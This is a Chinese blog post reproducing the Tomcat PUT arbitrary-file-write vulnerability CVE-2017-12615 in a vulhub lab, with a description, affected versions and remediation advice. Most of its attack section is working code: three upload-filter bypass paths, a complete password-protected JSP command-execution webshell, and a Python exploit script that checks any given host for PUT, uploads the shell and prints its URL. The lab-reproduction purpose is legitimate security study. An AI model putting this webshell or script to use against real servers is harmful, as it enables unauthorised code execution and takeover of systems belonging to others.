Tomcat任意写入文件漏洞(CVE-2017-12615)

于 2023-10-12 12:01:38 发布
阅读量77 收藏
点赞数 1
文章标签: tomcat
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hovcfuti/article/details/133787258
版权

漏洞描述

当 Tomcat运行在Windows操作系统时,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限,执行命令。

属于配置问题

漏洞原理

当在Tomcat的conf(配置目录下)/web.xml配置文件中添加readonly设置为false时,将导致该漏洞产生,(需要允许put请求)

影响范围

Apache Tomcat 7.0.0 - 7.0.79 Apache Tomcat/8.5.19

漏洞复现

使用vulhub搭建环境,代号/tomcat/CVE-2017-12615

访问

直接使用burp suite抓包

发送到repeater,修改请求方式为put,将写好的jsp木马放到请求体中

我这里的jsp木马是使用哥斯拉生成的

支持三种上传绕过方式 默认使用put 加文件名是失败的 需要绕过

PUT /shell.jsp%20

PUT /shell.jsp::$DATA

PUT /shell.jsp/

访问木马

浏览器访问

哥斯拉连接

还可以将木马替换为相应poc来执行命令

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp

+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>

浏览器访问上传文件后边加上?&pwd=023&cmd=whoami或其他命令

或者使用代码利用(膜拜大佬)

#! -*- coding:utf-8 -*-

import httplib

import sys

import time

body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp

+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>'''

try:

    conn = httplib.HTTPConnection(sys.argv[1])

    conn.request(method='OPTIONS', url='/ffffzz')

    headers = dict(conn.getresponse().getheaders())

    if 'allow' in headers and \

       headers['allow'].find('PUT') > 0 :

        conn.close()

        conn = httplib.HTTPConnection(sys.argv[1])

        url = "/" + str(int(time.time()))+'.jsp/'

        #url = "/" + str(int(time.time()))+'.jsp::$DATA'

        conn.request( method='PUT', url= url, body=body)

        res = conn.getresponse()

        if res.status  == 201 :

            #print 'shell:', 'http://' + sys.argv[1] + url[:-7]

            print 'shell:', 'http://' + sys.argv[1] + url[:-1]

        elif res.status == 204 :

            print 'file exists'

        else:

            print 'error'

        conn.close()

    else:

        print 'Server not vulnerable'

except Exception,e:

    print 'Error:', e

这里再贴一下另一个可以命令执行的漏洞,有兴趣可以看一下

Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现

来自 <Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现_apache tomcat/7.0.90漏洞-CSDN博客>

漏洞修复

1、配置readonly值为True或注释参数,禁止使用PUT方法并重启tomcat。 注意:如果禁用PUT方法,对于依赖PUT方法的应用,可能导致业务失效。

2.当然也可以在前端(例如WAF)上阻止PUT和DELETE请求。

3.升级tomcat版本

白鲨6
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Tomcat 通过 PUT 方法任意写入文件漏洞 (CVE-2017-12615)
薛定谔嘚喵博客
04-02 1119
CVE-2017-12615 对应的漏洞任意文件写入,由于配置不当(非默认配置),导致可以使用 PUT 方法上传任意文件Tomcat设置了写权限(readonly=false),导致可以使用PUT方法上传任意文件
tomcat漏洞学习——CVE-2017-12615Tomcat任意写入文件漏洞
记录并分享学习安全的知识点..
05-05 838
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 目录 警告 一、概述 二、影响版本 三、漏洞原理 四、环境搭建 五、 漏洞复现 (一)手动验证复现 1.首先抓包,验证jsp文件: 2.发现404页面,换成txt文件,发现可以的: 3.根据源码,只要在jsp小马后面加一个/,就可以上传成功: 4.小马利用: ​(二)exp验证复现 ​(三)工具检测 一、概述 tomcat的配置具有可写权限,因此可以利用put方法上传任意文件。但是tomcat对...
Tomcat PUT方法任意文件漏洞CVE-2017-12615
haha1314的博客
07-25 1808
Tomcat PUT方法任意文件漏洞CVE-2017-12615Tomcat版本:8.5.19 Apache Tomcat 7.0.0 - 7.0.79 漏洞本质Tomcat配置了可写(readonly=false),导致我们可以往服务器写文件: <servlet> <servlet-name>default</servlet-name> ...
Tomcat任意写入文件漏洞CVE-2017-12615
灰太的表格的博客
07-23 232
Tomcat任意写入文件漏洞 漏洞原理:在web.xm文件Tomcat设置了写权限(readonly=false),导致我们可以向服务器写入文件
Tomcat漏洞CVE-2017-12615 CVE-2020-1938 tomcat8漏洞复现分析
m0_61506558的博客
09-21 3151
tomcat存在管理后台进行应用部署管理,且管理后台使用HTTP基础认证进行登录。若用户口令为弱口令,攻击者容易进行暴力破解登录后台并进行应用管理。Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。
vulfocus——Tomcat任意写入文件漏洞(CVE-2017-12615)
Zichel77的博客
08-09 1177
打开靶场如图 根据提示,可以使用PUT方法上传任意文件,于是抓包 将其传给Repeater 将头修改为PUT,并上传jsp文件,注意上传的时候一般jsp都是不被允许上传的,所以我们需要绕过,主要有三种方法 注意!!!!PUT后面要有空格!!!!否则行不通!!!! 法一: 使用斜杠/,斜杠在文件名中是非法的,所以会被去除(Linux和Windows) PUT /x.jsp/ HTTP/1.1 法二: 使用空格%20,在Windows下不允许文件以空格结尾,因此上传到windo..
漏洞复现-Tomacat-文件上传】vulfocus/tomcat-cve_2017_12615
10-09 1366
【Tomacat-文件上传】
Tomcat任意文件写入(CVE-2017-12615)漏洞复现
weixin_45540609的博客
07-28 1942
一、漏洞原理 影响范围:pache Tomcat7.0.0-7.0.81(默认配置) 如果配置了默认servlet,则在9.0.1(Beta),8.5.23,8.0.47和7.0.82之前的所有Tomcat版本都包含所有操作系统上的潜在危险的远程执行代码(RCE)漏洞CVE-2017-12615:远程代码执行漏洞。只需参数readonly设置为false或者使用参数readonly设置启用WebDAV servlet false。此配置将允许任何未经身份验证的用户上传文件(如WebDAV中所使用的).
Tomcat任意写入文件漏洞CVE-2017-12615)复现
m0_54899775的博客
03-17 4461
Tomcat任意写入文件漏洞CVE-2017-12615)复现
复现Tomcat PUT方法任意文件CVE-2017-12615
qq_54713392的博客
05-08 396
复现Tomcat PUT方法任意文件CVE-2017-12615漏洞原理: 漏洞的产生是由于配置不当(非默认配置),将配置文件( conf/web.xml)中的readonly设置为了false,导致可以使用PUT方法上传任意文件,但限制了jsp后缀,不过对于不同平台有多种绕过方法 攻击机:window10 IP:192.168.32.1 靶机:ubantu16.04 IP:192.168.32.142 (1)在vulhub靶场中找vulhub/tomcat/CVE-2017-12615 开启
Tomcat任意写入文件漏洞CVE-2017-12615)复现(详细完整原理篇,小白也能看得懂)
qq_68064663的博客
05-05 2648
tomcat任意写入文件漏洞复现
tomcat 文件上传 (CVE-2017-12615)漏洞复现
weixin_42675091的博客
09-01 413
tomcat 文件上传 (CVE-2017-12615)漏洞复现
[Vulfocus解题系列]Tomcat 远程代码执行漏洞(CVE-2017-12615)
00勇士王子的博客
01-03 1703
介绍 Tomcat 是一个小型的轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。 攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 的webshell文件JSP文件中的恶意代码将能被服务器执行,导致服务器上的数据泄露或获取服务器权限。 复现过程 访问根路径 burp抓包 修改第一行为PUT和增加POST请求体,修改后为 PUT /shell.jsp/ HTTP/1.1 Host: vulfocus.fofa.so:5
使用vulfocus靶场复现Tomcat 任意写入文件漏洞CVE-2017-12615
R0ot
10-15 1059
访问192.168.229.130:50997即可打开tomcat 文件上传 (CVE-2017-12615)漏洞环境。修改GET类型为PUT,之后再 最下面插入冰蝎一句话木马,点击send返回201说明成功了。运行后可以看到报错了,JDK版本为11.0,冰蝎需要在Java1.8.0下运行。复制about:preferences到火狐浏览器中打开,配置代理。Tomcat 任意写入文件漏洞CVE-2017-12615)可以看到版本已经为1.8.0了,我们再次运行冰蝎子。搜索CVE-2017-12615
【vulfocus】tomcat文件上传 (CVE-2017-12615)
RexHa的博客
10-17 1595
vulfocus靶场 tomcat-文件上传 名称: vulfocus/tomcat-cve_2017_12615:latest
tomcat put 漏洞CVE-2017-12615
向安全进发的博客
04-16 294
org.apache.catalina.servlets.DefaultServlet:默认处理静态文件(除jspjspx之外的文件),存在PUT上传处理逻辑,可以处理PUT请求。所以我们即使可以PUT一个文件到服务器但也无法直接PUT以jsp,jspx结尾文件,因为这些这些后缀的文件都是交由JspServlet处理的,它没法处理PUT请求。org.apache.jasper.servlet.JspServlet:默认处理jspjspx文件请求,不存在PUT上传逻辑,无法处理PUT请求。
[CVE-2017-12615] Tomcat任意写入文件漏洞重现
aovenus的专栏-测试新时代(微信公众号:测试新时代)
10-18 966
[CVE-2017-12615] Tomcat任意写入文件漏洞重现
漏洞复现】Tomcat 任意写入文件漏洞CVE-2017-12615
m0_46344990的博客
11-13 1377
Apache Tomcat 7.0.0到7.0.79版本中存在远程代码执行漏洞,当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法时,攻击者可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件文件中的代码被服务器执行。
【Vulfocus漏洞复现】tomcat-cve_2017_12615
weixin_45632448的博客
04-07 512
访问目标 http://123.58.236.76:15450/ burp抓包 修改请求方式为PUT,增加POST请求体 PUT /shell.jsp/ HTTP/1.1 Host: 123.58.236.76:15450 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
cve-2017-12615漏洞复现
最新发布
06-28
cve-2017-12615漏洞是Apache Tomcat服务器中的一个远程代码执行漏洞。攻击者可以通过发送特定的HTTP请求来利用该漏洞,从而在服务器上执行任意代码。 要复现该漏洞,需要满足以下条件: 1. 目标服务器上运行的是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值